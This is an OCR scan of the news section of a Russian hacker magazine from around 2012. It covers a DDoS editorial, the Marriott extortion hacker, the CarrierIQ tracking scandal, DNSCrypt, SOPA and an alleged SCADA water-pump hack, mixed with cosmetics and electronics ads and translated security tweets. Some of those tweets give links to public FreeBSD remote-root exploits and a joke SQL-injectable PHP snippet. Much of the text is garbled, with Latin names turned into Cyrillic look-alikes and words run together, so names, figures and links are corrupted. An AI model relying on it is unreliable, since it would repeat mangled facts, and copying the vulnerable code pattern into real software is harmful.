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Вся^родуіедій -ТЕВЬЕ МОЛОЧНИК* произведена из цельного 
(невосстановленного) молока очень высокого качества. 
Такой строгий контроль оказывается важным и для людей, 
заботящиеся о здоровье, поскольку в последнее время ив рынке появилось 
много подделок и разбавлений как молока, так и продуктов 
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Во время новогодних праздников сложилась очень ироничная 
ситуация. Только мы закончили делать интервью с создателями 
анти-ДДоСтехнологии ОРАТОР, какнаш сайти форум капитально 
легли отмощного новогодне-рождественского ДДоСа. Ситуация 
была очень простая: 100 мегабитный канал нашего сервера ока- 
зался почти на 100%загружен левыми запросами и ресурсовдля 
обслуживания нормальных посетителей уже не осталось. Причем 
не только на уровне канала, ной на уровне производительности 
самой платформы. 

Ситуацию спасло только обращение как раз к нашим друзьям 
из НідЫоасІ І_аЬ, сервис которых достаточно быстро решил пробле- 
му, грамотнозафильтровав вражеский ботнет. Надо сказать, это 
противостояние между интернет-сервисами и ДДоС-ботнетами- 
достаточноунылая история. Посути, все опятьупирается вденьги: 
ведь и организация атак, и защита от них требу ют финансовых 
вливаний. 

Радует одно: по моим подсчетам в этом финансовом споре 
перевес все-таки на белой стороне: организация атак стоит подо- 
роже, чем пользование специальными сервисами для фильтрации 
трафика. Прикинуть просто: условная стоимость примитивного 
ООоЗ'а начинается от $50 в сутки, то есть за месяц ООоЗ’а придет- 
ся выложить $1500. Уже эта сумма явно больше, чем требуется для 
фильтрации зловредной активности: за 50 баксов в день ничего 
сверхъестественного не сделаешь, а стоимость профессиональ- 
ной защиты начинается от $160 в месяц. 

В то же время для неподготовленного ресурса даже прими- 
тивный ДДоС может стать настоящей бедой: мало того, что никто 
обычно к этому не готов в техническом плане, ной необходимость 
платить пусть даже $160 в месяц может оказаться смертельной 
для частного некоммерческого сайта. Так что 00о5 сейчас это как 
туберкулез — болезнь бедных :(. 

пікі(022,гл.ред.Х 

5Ьор.аІс.ги/хакер 
ѵкопіакіе.ги/хакер таа 
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КАКИЕ НУЖНО УСТРАИВАТЬСЯ 
НА РАБОТУ 



ХАКЕР ПОПЫТАЛСЯ НАНЯТЬСЯ В КОМПАНИЮ, 
КОТОРУЮ САМ ЖЕ И ВЗЛОМАЛ 




Компания МаггіоН 

оцениваетсвоиза- 

тратыв400тыс.— 1 

млндолларов.День- 

гиушлинаоплату 

услуг консультантов, 

устранение бреши 

вбезопасностиивы- 

явлениеущерба,на- 

несенногохакером. 



ФЛЕШКАСДВУМЯ 
СТЕПЕНЯМИ ЗАЩИТЫ 

ДЕВАЙС ДЛЯ ОЧЕНЬ-ОЧЕНЬСЕКРЕТНЫХ ДАННЫХ 




лучай, произошедший недавно в США, доказывает, что даже умелый 
хакер может быть дура ком. А как еще назвать парня, попавшего в руки 
Секретной службы США по собственной глупости? Отличившегося 
венгерского хакера зовут Аттила Немет, ему26 лет, и он решил устроиться 
на работу очень необычным образом. Еще в прошлом году хакер разослал со- 
трудникам сети Маггіои (эта крупная сеть отелей, работающая по всему миру, 
наверняка тебе знакома) инфицированные трояном письма. Всего пострадало 
около ста человек. С помощью троянца хакер успешно добрался до конфиден- 
циа л ьных финансовых да иных компании и похитил документацию. Затем он 
принялся удаленно шантажировать Маггіои, угрожая опубл и ковать у кра- 
денные денные, если ему не дадут работу в ІТ- подразделен и и сети отелей! 
Неудивительно, что такой наглости в Маггіои не выдержали и обратились 
за помощью в Секретную службу США. Люд и из органов, прикинувшись НР- 
специалистами, пообщались с Неметом по е-таіі и телефону и в итоге назна- 
чили ему собеседование на территории США. Когда хакер прилетел в Штаты, 
с ним действительно провели беседу, и он былуверен, что общается с обычным 
рекрутером. Входе интервью Немет сам выложил всё о письмах, заражении, 
шантаже. Самонадеянного хакера, разумеется, арестовали. Хотя Немет во всем 
сознался, теперь ему грозит до десяти лет тюрьмы. 




□ овеем скоро в производство, азатем и в продажу 
поступитфлешка Сгуріекз, обладающая сразу 
двумя механизмами защиты. Это устройство 
поможет сохранить твои данные в безопасности, даже 
если третьим лицам удалось получить физический доступ 
к флешке. Длятогочтобы его ограничить, разработчики 
поставляют с флешкой криптекс — цилиндрический 
механизм с пятью кодовыми кольцами, на каждое из ко- 
торых на несено 26 букв латинского алфавита. На выходе 
получается порядка 12 млн комбинаций, то есть вскрыть 
такойзамокбудетвесьматрудно. Нодажеесли флешку 
удастся извлечь из криптекса и вставить в компьютер, для 
доступа кданным придется ввести еще и код, поскольку 
накопитель оснащен чипом 256-битного АЕ5-шифрования. 
Чтобы вскрытьэтузащиту, придется изрядно попотеть. 

В штатном режиме Сгуріекз обеспечивает скорость чтения 
24Мб/си скоростьзаписи 10 Мб/с. Устройство ожидается 
в продаже уже в этом году. Стоимость Сгуріекз 115В на 8 Гб 
составит 130 долларов, а на 16 Гб — 160 долларов. Цена 
бюджетной модели объемом 4 Гб пока, увы, не сообщается. 
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45 ГБИТ/С— ТАКОЙ ВЕЛИЧИ- 
НЫ ДОСТИГЛА МОЩНОСТЬ 
0005-АТАКИ, зафиксирован- 
ной специалистами Ргоіехіс. 
Пятнадцать тысяч запросов 
в секунду, это практически 
ОйоБгода. 




ПРЕЗИДЕНТ И ГЕНЕРАЛЬ- 
НЫЙ ДИРЕКТОРИИ Оізпеу 
РобертАйгерприобрел цен- 
ные бумаги компании Арріе 
на сумму почти один миллион 
долларов— всего 2670 акций 
по цене$375за штуку. 




ИЗ 600СІ.Е+ ТЕПЕРЬ МОЖНО 
БЕСПЛАТНОЗВОНИТЬ на мо- 
бильные и стационарныете- 
лефоны:такой функционал 
появился у «Видеовстреч». 
Увы, пока он доступен только 
для США. 




ЭКСПЕРТЫ МСАРЕЕ ПРО- 
ЧАТ ПЛАТФОРМЕ АНОКОЮ 
ВИРУСНУЮ ЭПИДЕМИЮ. По их 

данным, количество вирусов 
для Апсігоісі выросло на 37% 
по сравнению со вторым 
кварталом 2011 года. 



К 



МѴ50І..С0М СНОВА ВЗЛО- 
МАЛИ ПРИ ПОМОЩИ 501- 
ИНЪЕКЦИИ, на этот раз от- 
личился хакер О35М0ЫО142. 
Может, это было бы не смеш- 
но, если бы это не был уже 
третий случай за год. 
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ѵѵѵѵѵѵ.покіа.ги/800 
ІЧокіа І_итіа 800 











фС# 






ѴѴІПСІО\Л/$ 

РГюпе 



ІЧОКІА 

ШМІА 



ѴѴіпсІоѵѵз® РИопе - телефон ѴѴіпсІоѵѵз. ХЬох® І_ІѴЕ - ХЬох Лайв. Использование сервисов требует передачи данных через Интернет. Стоимость 
передачи данных уточняйте у своего оператора связи и интернет-провайдера. Реклама. © ІМокіа, 201 2. ѵѵѵѵѵѵ.покіа.ги. ООО «Нокиа», 1 25009, г. 
Москва, ул. Воздвиженка, д. 1 0. ОГРН 1 067760638208. © МісгозоП:, 201 2. Все права защищены. 




МЕ0АЫЕѴѴ5 



БЕТА-ТЕСТ МІСК050РТ ОРРІСЕ 15 должен стартоватьуже совсем скоро, в январе 2012-го. 



ЗАЩИТАДЛЯ ОИЗ-СОЕДИНЕНИЙ 

В 0РЕЫ0Ы5 ПРИДУМАЛИ НОВОЕ СРЕДСТВО ДЛЯ ПРЕДОТВРАЩЕНИЯ 
АТАК ТИПА МАЫ-ІМ-ТНЕ-МШОІ.Е 




«Нашатехнология 

дополняетОМББЕС 

и все другие службы, 

связанные сзащитой 

ОМБ.йМБСгурІсразу 

жепослеустановки 

обеспечивает 

безопасностьипри- 

ватностьобменя 

йМБ-трафиком 

междутобой 

иОрепОЫБ»(Дэвид 

Юлевич, основатель 

иглаваОрепОЫБ). 



омпания 0реп0Ы5 анонсировала проект 0Ы5СгурІ — новое сред- 
ство для защиты от атак, связанных с модифика цией транзитного 
трафика 0Ы5 или манипулрованием им (тап-іп-ТЬе-тісІсІІе, спуфинг 
или снифинг). Основная задача проекта состоит в полном шифровании канала 
связи между клиентом и сервером 0Ы5. Примернотакже55І_ используется для 
шифрования НТТР-трафика. 0М5СгурІдополняеттехнологию 0Ы55ЕС, которая 
в первую очередьобеспечиваетаутентификацию, верификацию и получе- 
ние да иных, ноне предоставляет средств для их шифрования. По сравнению 
с проектом ОЫЗСигѵ, который осуществляетполный цикл шифрования всех 
запросов 0Ы5, ОЫБСгурІзначительноупрощен, причем каксточки зрения 
реализации, так и в плане конфигурации. ОЫЗСгурІ ориентирован только 
на шифрование канала связи между пользователем и резолвером 0Ы5и не за- 
трагивает шифрован ие данных между РЫБ-сервера ми. ОЫБСгурІ использует 
реализацию алгоритма Сигѵе2551 9 (шифрование по эллиптическим кривым) 
вместо Р5А. Серверная часть ОЫБСгурІ, выполненная в виде прокси, может ра- 
ботать в большинстве серверных систем, включая ОрепВЗО, ЫеИЗЗО, йгадопИу 
В50, РгееВЗО, Ыпихи Мае 05 X. ОЫЗСгурІ не поддерживает кеширование, поэ- 
тому разработчики рекомендуют использовать его в сочетании с поддерживаю- 
щими кеширование резолверами, такими какІІпЬоипсІ, РомегОЫЗ и сІпзсасЬе. 
Клиентская часть пока, к сожалению, разработана только для Мае 05 X. 




ПОСЛЕДНИЕ СЛУХИ С ВОСТОКА 



ИЗ ЮЖНОЙ КОРЕИ СООБЩАЮТ, 
ЧТО КОМПАНИЯ 5АМ51Ж6 В 2012 
ГОДУ ВООБЩЕ ПЛАНИРУЕТ 
ОТКАЗАТЬСЯ ОТ ВЫПУСКА 
НЕТБУКОВ С ЭКРАНОМ 10" 



САВВІЕВЮ СЛЕДИТ 
ЗА ТОБОЙ 

НОВЫЙ СКАНДАЛ ИЗ-ЗА ШПИОНСКОГО 
ПОНАСМАРТФОНАХ 

□ кандал сучастием ведущих компаний — произво- 
дителей смартфонов и ФБР разразился недавно 
из-за странного «открытия» АпсІгоісІ-разработчика 
Тревора Экхарта. Всё началосьсзаявления, котороеон 
опубликовал на сайте апбгоібзесигіІуІезСсот. Оно гласило, 
что ПО некой компании СаггіегЮ в реальном времени за- 
поминает, какие клавиши он нажимаетна своемтелефоне, 
фиксируетего передвижения и всеми доступными методами 
следитза ним без его ведома и согласия. По словам Экхарта, 
приложениетакжешпионитза владельцами миллионов 
смартфонов под управлением АпбгоісІ, РІМ и ОС ІМокіа (про- 
блема имеется далеко не во всех прошивках и моделях). 

Не прошло и недели, как из компании СаггіегЮ Экхарту 
прислали письмо-предупреждение (Сеазе&Оезізі). В нем 
говорилось, чтоЭкхартякобы нарушил патент(тоестьопу- 
бликовалтеданные, которые не имел права публиковать), 
а также распространял лживые сведения. Разработчик 
нерастерялся изаручился поддержкой ЕІесІгопісРгопІіег 
Роипсіаііоп, которая подтвердила что, согласно Первой 
поправке к Конституции США, его публикация не нарушает 
закон. СаггіегЮпришлось«сдатьназад»и извиниться. «Мы 
заблуждалисьи поэтому приносим мистеруЭкхартусвои 
извиненияза проблемы, которые могли возникнутьу него 
в связи с нашим письмом. Мы уважаем работу ЕРР и раз- 
деляем их заинтересованность в защите прав на свободу 
слова вбыстроразвивающемсятехнологическом мире», — 
гласит официальное заявление. Однако компания всё равно 
продолжала отрицать, что ее ПО является руткитом и следит 
за пользователями, игнорируязакон. ОднакоТреворЭкхарт 
на этом не остановился. В ответ на заискивания компании 
он опубликовал наУоиТиЬе видео ( ѵоіЛи.Ье/Т17Х0І АУІМо ). 
в котором наглядно продемонстрировал всё то, о чем писал 
ранее. С помощью анализатора пакетов он показал, как 
софт от СаггіегЮ регистрирует каждое нажатие клавиши 
и каждое полученное5М5, покаустройство находится 
в режиме полета. Затем он подключил телефон к ѴѴі-Рі-сети 
и открыл СоодІе.Хотя он отказал поисковому гиганту в за- 
просе на определение местоположения, СаггіегЮ все равно 
зафиксировал его. Потом шпионское ПО в точности записало 
его поисковый запрос (ЬеІІо ѵѵогісі), хотя он ввел его на стра- 
нице, которая используетпротокол 55І_. Видео, которое 
заканчивается резонными вопросами «почему вызывается 
5М5І\ІоШу, отсылающий текстовые сообщения в СаггіегЮ?» 
и «почему читаются да иные, передаваемые по моему 
ѴѴі-Рі-соеди нению моим браузером, особенно по прото- 
колу НТТР5?», содержитеще много интересного. Можешь 
посмотретьсам. Инцидент, получивший широкий резонанс 
в СМИ, побудил сенатора Эла Франкена потребоватьу ком- 
пании СаггіегЮ объяснений о том, почему она считает, что их 
диагностическое ПО, встроенное в 141 модель смартфона, 
ненарушаетзакон США о несан кционированных подклю- 
чениях к линиям связи. Компания Арріе спешно заверила, 
что софт от СаггіегЮ давно не входит в состав І05. На самом 
деле ПО есть, но оно просыпается только в активном диа- 
гностическом режиме, который поумолчанию в«яблочных» 
аппаратах, конечно, отключен. ФБР, в свою очередь, отказа- 
лось комментировать ситуацию, сославшись на то, что ведет 
некое расследование. Пока неясно, использует л и само ФБР 
софт от СаггіегЮ, или ведет расследование в отношении 
СаггіегЮ, или совмещаетито и другое. 
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ѴѴЕЗ РОСНЕР 

Г Р А N С Е Ив Роше - Создатель Растительной Косметики 




НЕ РЕШАЕШЬСЯ 

подойти ко мне? 




А 



ЭФФЕКТИВНОСТЬ ПРОТИВ ПРЫШЕЙ 
И БЕРЕЖНОЕ ОТНОШЕНИЕ К КОЖЕ 



Исследователи Растительной Косметики Ив Роше объединили 
салициловую кислоту, обладающую антибактериальным эффектом и 
способствующую обновлению кожи, для эффективного воздействия на 
прыщи, и экстракт мякоти Алоэ Вера БИО, получивший признание 
благодаря своим восстанавливающим свойствам, для гарантии 
оптимальной переносимости кожей. 

Эффективность доказана: 

- Глубоко очищает кожу. 

- Устраняет черные точки. 

- Предупреждает появление прыщей и черных точек. 




Узнать больше: 



Присоединяйтесь 



\длллѵ.уѵе5-госЬег.ш 

Тел.: 8-800-3333-000 (звонок бесплатный) 



Реклама. Товар сертифицирован. (1 ) Самостоятельная оценка, тест на удовлетворенность 
продуктом, проведенный при участии 26 человек. 

* Формула создана под дерматологическим контролем. Рекомендовано французскими дерматологами. 



ПОБЕДИ РОБОСТЬ С 

риге 

5 у 5 I 0 т 

ПЮР СИСТЕМ 



* * 





МЕ6АЫЕѴѴ5 



ПОДАННЫМ МІСК050РТ, ПИРАТСКИЕ ОѴй ПРОДАЮТ в 53 % магазинов Пскова, 44 % магазинов Красноярска и 43 % магазинов Сургута. 



САМЫЕУЯЗВИМЫЕ СМАРТФОНЫ 
2011 ГОДА 

СПЕЦИАЛИСТЫ ВІТ9 ОПУБЛИКОВАЛИ ЗАНИМАТЕЛЬНЫЙ АНТИТОП 





Полныйсписокуяз- 
вимыхаппаратов, 
по версии ВІ19, вы- 
глядит следующим 
образом: 

1. БатзипдбаІаху 
Міпі. 

2. НТС Оезіге. 

3. БопуЕгіс550п 
ХрегіаХЮ. 
4.5апуо2іо. 

5. НТСѴѴіІсИіге. 

6. Батзипд Еріс 46. 
7.1_60р1ітиз5. 
Ѳ.БатзипдСаІахуБ. 
9. Моіогоіа ОгоШХ. 
Ю.ЮОрНтизОпе. 

11. МоІогоІа Огоісі 2. 

12. НТСЕѵо4С. 



□ мериканская компания ВІ19 опубликовала результаты очередного 
исследования. «Грязная» дюжина наиболее уязвимых смартфонов, 
пользующихся популярностьюу потребителей, выглядитзабавно. 
Весь этот список состоит из аппаратов, работающих под у правлением разных 
версий ОС АпсІгоісІ. Почетное 13 место занимает іРЬопе 4 вместе с более ста- 
рыми модификациями «яблочного»аппарата. Критериями попадания в этот 
Ыаскіізі стали популярность на рынке, устаревшая небезопасная версия ОС, 
установленная по умолчанию, и самые медленные циклы обновления. 

Далеко не почетное первое место в а нтитопе досталось Ватвипд Оаіаху Міпі, 
а второе и третье места принадлежат не менее известным «трубкам» НТС 
Оезіге и 5опу Егісззоп Хрегіа XI 0 соответственно. 

Почему «черный список» полностью состоит из ап паратов на базе АпсІгоісІ 
ОС? Исследователи ВП:9 показали, что на 56 % (!) всехустройств на базе 
АпсІгоісІ, представленныхсегодня на рынке, установленаустаревшая версия 
ОС.Такиепроизводители мобильныхустройств, какВатзипд, НТС, Моіогоіа 
и І_0, зачастую продаютсмартфоны суже устаревшим предустановленным ПО, 
Впоследствии они вовсе не торопятся модернизировать эти аппараты и осна- 
щать их последними и наиболее безопасными версиями АпсІгоісІ. 



50РАУГР0ЖАЕТ 
«ВКОНТАКТЕ» 
ИРІЯРАСКЕР 

НОВЫЙ ЗАКОНОПРОЕКТ БОРА (ВТОРОМ II ЫЕ 
РІКАСѴАСТ) НАЦЕЛЕН НАБОРЬБУ С ПИРАТСТВОМ 
В ИНТЕРНЕТЕ 

Палату пред- 
ставителей США 
поступил на рас- 
смотрение законопроект 
5іор Опііпе Рігасу Асі 
(ВОРА), предлагающий 
беспрецедентные меры 
в отношении иностран- 
ных сайтов с нелицен- 
зионным контентом. 

Планируется изымать 
домены у владельцев, 
блокировать их счета 
в платежных системах, 
перекрывать им источни- 
ки финансирования (например, исключать эти ресурсы 
из рекламной программы АсІВепзе), удалять контент этих 
сайтов из поисковых систем и на уровне І5Р блокиро- 
вать доступ к ним с территории США. Что хуже, ВОРА 
может при крыть лазейку в йМСА, которая позволяла 
тем сайтам, с которых пиратский контент скачивали 
сами пользователи, избегать ответственности за его 
распространение. Представители МРАА и РІАА опубли- 
ковали списки сайтов, которым ВОРА грозит в первую 
очередь. Этоторрент-трекеры (втом числе гиігаскег.огд 
и сіетопоісі.те ) и различные файл-хостинги. Отдель- 
но упомянут ВКонтакте, где реализованы некоторые 
функции, которые «умышленно и эффективно нарушают 
законодательство». 

Лоббисты из Голливуда уверяют, что только так можно 
бороться с пиратством вне американской юрисдикции 
и в будущем сохранить мировое лидерство США на рынке 
продуктов интеллектуальной собственности. Против- 
никами проекта стали интернет-сообщество, компании 
Соодіе, УаЬоо, РасеЬоок и веете, кто говорят о недопу- 
стимости введения цензуры в интернете, ведь право- 
обладатели получают возможность без суда требовать 
закрытия практически любого сайта. 





ЛИДЕРВОБЛАСТИ ПРОИЗВОДСТВА 
АКУСТИКИ ДЛЯ КОМПЬЮТЕРОВ 
ПРЕДСТАВЛЯЕТОБНОВЛЕННУЮ 
ЛИНЕЙКУКОЛОНОК. 




Е01Р1ЕКК2500 

ЕсЛНегІпІегпаІіопаІИсІ. расширяет свою линейку 
аудио систем 2.0. Одна из новинок данной линей- 
ки— колонки ЕсІіПегВ2500. Эта аудио система 
идеально подойдет для дома или офиса. Новинка 
оснащена встроенным ЦБВ портом, 5й кардриде- 
ром, РМ-тюнером и входом АІІХдля подключения 
любых источников звука. Колонки выполнены в 
деревянном корпусе и производятбО Втмощности. 
Это обеспечивается благодаря 5 -дюймовым маг- 
нитно экранированными динамикам, и 1-дюймо- 
вомутвиттеру и 2усилителям (для каждой колонки 
свой). ЕсІіНег В2500 — впечатляющая система для 
тех, кто ищетотличное качество звука. 





ДЖОН КАРМАК ИЗ Ш 
50РТѴѴАКЕІ ВЫЛОЖИЛ В ОТ- 
КРЫТЫЙ ДОСТУП исходники 
движка Ооот III подсвобод- 
ной лицензией. Программи- 
сты уже нашли в коде кучу 
ошибок. 



ВЯНВАРЕСТЭНФОРДОТ- 
КРЫВАЕТ БЕСПЛАТНЫЕ 
КУРСЫ ПО КРИПТОГРАФИИ: 

сгуріо-сіазз.огд. Лекции 
будет читать профессор Дэн 
Бонех, один из разработчи- 
ковісрсгурі. 
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НЕ ЭКОНОМЬТЕ НА ПРИНТЕРЕ, ЭКОНОМЬТЕ 
НА РАСХОДНЫХ МАТЕРИАЛАХ. 

КѴОСЕКА. НАДЕЖНОСТЬ, КОТОРАЯ ОКУПАЕТСЯ. 




Тот факт, что расходы на обслуживание всегда превосходят цену приобретения 
устройства, сегодня не вызывает сомнений. Создавая устройства на базе 
уникальной технологии ЕС05У5, компания КѴОСЕКА использует долговечные 
компоненты. Это делает нашу печать в высшей степени надежной, позволяет 
нашим МФУ бесперебойно работать в течение длительного времени и создает 
непревзойденно низкую общую стоимость владения в своем классе. Экономьте с 
каждой новой страницей вместе с компанией КѴОСЕКА. ѵѵѵѵѵѵ.куосегатііа.ги 

КѴОСЕКА. ВЫ МОЖЕТЕ НА НАС ПОЛОЖИТЬСЯ. 




КИОСЕРА МИТА Рус - Телефон +7 (495) 741 00 04 - ѵѵѵѵѵѵ.куосегатііа.ги 

Корпорация КѴОСЕКА МІТА - ѵѵѵѵѵѵ.куосегатііа.сот 



ЗкчосЕгса 



МЕ6АЫЕѴѴ5 



ТРИ ГОДА ПОТРЕБОВАЛОСЬ АРР1Е,чтобы закрыть дыру в іТипез, через которую с 2008 года распространялся троян РіпРізИег. 



ЗАЧЕМ РОССИЙСКИМ ХАКЕРАМ АМЕРИКАНСКИЙ НАСОС? 



ПЕРВАЯ В ИСТОРИИ ИНОСТРАННАЯ АТАКА НА КОММУНАЛ ЬНУЮ ИНФРАСТРУКТУРУ США ПОКА НЕ НАНЕСЛАУЩЕРБ 



екоторые американские эксперты давно 
предупреждают, что новые компьютерные систе- 
мы управления с модулями удаленного доступа 
для сетей водоснабжения, атакжеэлектросети зтагі 
дгісі сТСР/ІР-стеком представляетсобой потенциальную 
опасность. «Страшилки»ходятужелет 10-15, стех пор как 
началасьактивная компьютеризация объектов комму- 
нальной инфраструктуры. 

ИнцидентсоБШхпеІ показал, что атаки на промышлен- 
ныеобъекты не фантастика, а реальная сфера деятель- 
ности спецслужб. После этого инцидента американская 
военщина напряглась. Что будет, если такой вирус вы- 
ведет из строя, например, десяток американских АЭС? Как 
реагировать на диверсию? Пентагон попытался запугать 
потенциальных врагов и заявил, что ответом на нее может 
статьвоенныйудар. Сегодня военная доктрина США рас- 
сматривает кибератаки на национальную инфраструктуру 
как возможный повод для начала военных действий. 

И хотя до настоящего времени ни одна подобная зарубеж- 
ная атака не была реализована, всё когда-то случается 
в первый раз. 

Американский эксперте области безопасности 
БСАБА-систем Джо Вайссс 1998 года ведет счет произо- 
шедшим на промышленныхобъектахинцидентам, кото- 
рые могутобъяснятьсяхакерскойактивностью. В ноябре 
2011 года он поведал публике о «сенсационном» происше- 
ствии. Из своих источников Вайсс узнал, что иностранные 
хакеры проникли в 5СА0А-системууправления водопро- 
водом Сиггап-СагсІпегѴѴаІегОізІпсІ в города Спрингфилд 
(штат Иллинойс), которая обслуживает всего пару тысяч 
жителей. При закрытом расследовании инцидента в логах 
якобы был обнаружен российский ІР-адрес. Один из насо- 
сов водоподъемной башни сгорел в результате много- 
кратных включений и отключений. Расследование по- 
казало, чтосистемауправленияЗСАОАглючила втечение 
двух-трех последних месяцев. Поскольку вход в систему 
был осуществлен через обычную форму с логином и паро- 
лем, Вайсс заявил, что злоумышленник предварительно 
взломал сайт разработчика БСАБА-систем и получил базу 
с именами и паролями пользователей, так что опасность 
грозити системам водоснабжения в другихамериканских 
городах. Шумиха поднялась немалая — всё-таки речьшла 
о первой в истории зарубежной атаке на коммунальную 
инфраструктуру США. 
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ОГѴЧАГ 



После шумихи с «взломом» насосной станции в Иллинойсе с прессой связался некто рг(И, который рассказал, 
насколько просто проникнуть вБСАйА-систему водопровода ЮжногоХьюстона (Техас). В качестве доказатель- 
ства он предъявил пять скриншотов и системную информацию. Хакер не причинил вреда системе, хотя могбы. 



К расследован ию подключились специалисты Ми- 
нистерства внутренней безопасности СШАиФБР. После 
предварительного анализа логов они сообщили, что 
никаких следов хакерской атаки не выявлено. Наличие 
российских ІР-адресов в логах компьютерной системы 
объясняется тем, что один из сотрудников организации- 
подрядчика выезжал в Россию по личному делу. Ну а сам 
водяной насос глючил и сломался отстарости. 

Каждый решаетсам, можноли веритьспециалистам 
из органов и Вайссу. С одной стороны, история о загра- 
ничной поездке сотрудника выглядиткак-то нелепо. РгОІ" 
говорит, что проникнуть в американскую БСАБА-систему 
того же водопровода способен даже двухлетний ребенок 
— это крайне просто. С другой стороны, зачем российским 
хакерам американский насос? 



ОЙКАН-ПАИ т 
ИАТЕЯВ5ТШ 





ФАЙРВОЛ ДЛЯ ТВОЕЙ КОЖИ 



Марка Ив Роше представляет гамму средств 
РигеБузІет, разработанную специально 
для молодой проблемной кожи. Данная 
программа эффективно борется с основны- 
ми признаками проблемной кожи: 

1) избыток кожного жира; 

2) неровная поверхности кожи; 

3) прыщи и черныеточки; 

4) следы после прыщей. 

Работая над РигеБузІет, Исследователи 
Растительной Косметики Ѵѵез РосИегоста- 
новили свой выбор на компонентах, кото- 



рые обеспечивают ультраэффективность 
против прыщей и ультрабережное отно- 
шение к коже. Это салициловая кислота и 
эстрактмякотиалоэ. 

Салициловая кисл ота, обладающая анти- 
бактериальным эффектом, удаляет отмер- 
шие клетки с поверхности кожи, а также 
борется с закупоренностью пор — главной 
причиной возникновения черных точек и 
прыщей. Алое смягчает кожу и укрепляет 
ее защитную функцию. 



ОТ 








Гатікко: 

Только что изменил имя своей 
точки ѴѴі-Рі на '5.99 евро/ми- 
нута'. Что ж, посмотрим, как 
много будет желающих, подсоединится к ней. 



бШаЬеаг: 

Написать компилятор несложно. 
А вот написание компилятора, 
который дает пользователю 
хорошие сообщения об ошибках — вот это 
сложно. 



Гаогіедааіігесіо: 

Не хочу раздувать, но в следую- 
щем нашем исследовании мы 
взломаем удаленно несколько 
звезд, похожих на солнце, луну и планету 
злых рептилий. 



(3(охо4ка: 

«Тебе также понадобятся мозги. 
Это конечно не модуль РегІ, но 
помогает.» 



Н Комментарий: 

Цитата из списка необходимых РегІ 
модулей для работы с здіпіща. 





гатск»_ 

ЩизегЧоІІоѵѵегз == 0 && изег. 
ЫІоѵѵіпд > 50 && *ѵѵее*.теп*іопз 
> 3 && *ѵѵее*.Ьаз_Ііпк){*ѵѵее*. 
І5_ргоЬаЫу_зрат} 



ГасШісИПеШ: 

Пачка новых багов в 1 1 дР2 была 
отправлена на зесаІегі изГЗ 
огасіе.сот и я так и не получил 
ответа в течение 24 часов... Вы ребята забы- 
ли меня? ;-] 

□ Комментарий: 

Дэвид Личфелд самый злостный 
убийца Огасіе. Все самые страшные баги в 
этой СУБД — его рук дело, при этом, если 
что не так, он не заискивает перед гигантом, 
а выкладывает Осіау баги в паблик (напри- 
мер, расскажет на ВІаскНа*) 



□ ГсМГіедгидя: 

Люди спрашивают: что означает 
выражение «боевой эксплойт»?. 
Ну что же, тут два ключевых 
направления, которые стоит посмотреть: 1] 
появляется ли калькулятор 2) присутствуют 
ли езсаре-последовательности 



гасШгпрр 

Мой любимый 5СИ_і сцена- 
рий: $ісІ=$_6ЕТ[ , ісГ]; $о=пеѵѵ 
ОЬіесі($ісІ); ЗЕБЕСТ ... ѴѴНЕРЕ 



ГЭАВагИапуик 

РгееВБй КрсІ апб РгоРТРб оп 
РгееВБО Ретоіе гООі Ехріоіі: 
Ы*р://\ллллллехрІоі*-бЬ.сот/ 



ехрІоіІз/18181/ 



(Всезагсег: 

СЭіЬедгидд, лол, я уже не боюсь 
«боевых эксплойтов». Я уже 
удалил саіс.ехе со всех своих 



(Вкеѵіптііпіск: 

Иранцы использовали 6Р5 
зрообпд для захвата американ- 
ского беспилотника. Если это 
правда, то может это вам ответ за 5*ихпе*? 



ГЗаІехтІттипНу: 

Продажа эксплойтов — это как 
продажа огнестрельного ору- 
жия. Люди могут использовать 
его для защиты себя или для нападения. В 
любом случае я сплю спокойно. 



(30еа(Іі5іагРК: 

Бігі, предупредительный 
выстрел по Альдерану. Я ска- 
зал «ПРЕДУПРЕДИТЕЛЬНЫЙ 
ВЫСТРЕЛ». Черт, проклятье, Бігі! 





(ВББсЫМасе: 

Из-за БОРАты можешь полу- 
чить 5 лет за скачивание песни 
Майкла Джексона, что на один 
год больше, чем получил доктор за его убий- 
ство... 

Комментарий: 

БОРА — Б*ор Опііпе Рігасу Ас*. 
Законопроект, который развязывает руки 
правообладателям и властям по воздей- 
ствию на «пиратские» ресурсы и их вла- 
дельцев. 



0 (ВІ.4тег53С: 

Клиент: «Я защищен, у меня есть 
ІР5, ѴѴАР, ІЧАС». Ага, то, что я 
надел нижнее белье, не означа- 
ет, что я не буду чувствовать удар по яйцам. 



(ЗсІОгпрр 

Когда вы пишете проверку под- 
писи, проверяйте, чтобы то, с 
чем вы сравниваете ее не выда- 
валось на ?беЬид=*гие. І_ОІ_ #ПРАКТИКА- 
ЗАЩИТЫ-ВЕБА 







(Ваагопрогіпоу: 

С этими БСАйА, широковещал- 
кой, медицинскими и спутни- 
ковыми исследованиями мы 
будем хакать как в фильмах в следующем 
году. 



ГаМтооге: 

Больше фана с ВБй произво- 
дными демонами Теіпе*: 
Ь**р://Ьі*.Іу/з8уу9Х < эксплойты 
для РгееВБй 5.3 -> 8.2 и РесІ На* Еп*егргізе 
І_іпих 3. 
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- СПЕЦИАЛИСТЫ «ДОКТОР ВЕБ» обнаружили ЗЗтроянца из семейства АпсІгоісІ.БтзБепсІ в АпсІгоісІМагкеІ. 



і_іі\іііхміі\іті2 

вышла новая версия популярной ымух-сборки 




Напомним, что 

Міпі выпускается 

в32-битнойи64- 

битнойверсияхдля 

х86-системиимеет 

весьмаскромные 

системныетребова- 

ния:512МБпамяти 

(рекомендуется 1 

ГБ),5Гбдискового 

пространства и гра- 

фическийадаптер, 

поддерживающий 

минимальное раз- 

решение800х600 

пикселей. Дистрибу- 

тивипихМіпИ2ты 

найдешьнадиске. 



оманда проекта І_іпих Міпі выпустила новую версиюсвоей бесплатной 
сборки, которая в последнее время обогнала по популярности даже 
незабвенную ІІЬипІи. 

Ыпих МІПІІ2, основанный на ІІЬипІи 11.10 и получивший кодовое имя Ыза, 
можетпохвастаться новым рабочим столом на базе бпотеЗ, в который были 
внесены некоторые дополнения. Крометого, он поставляется с форком более 
старой оболочки Споте 2, адаптированной для совместной работы с Споте 3. 
К другим улучшениям относится обновленный внешний вид с двумя новыми 
темами и новыми художественными работами. Найти новую версию можно как 
на сайте МіпШпих ( ІіпихтіпЕсот Ітак и на нашем диске :). 

Кстати, нельзя не упомянуть, что Ыпих Міпі недавно привлек пристальное 
внимание СМ И, та к как, по данным Ыпих ОізІгоѴѴаІсЬ, количество пользова- 
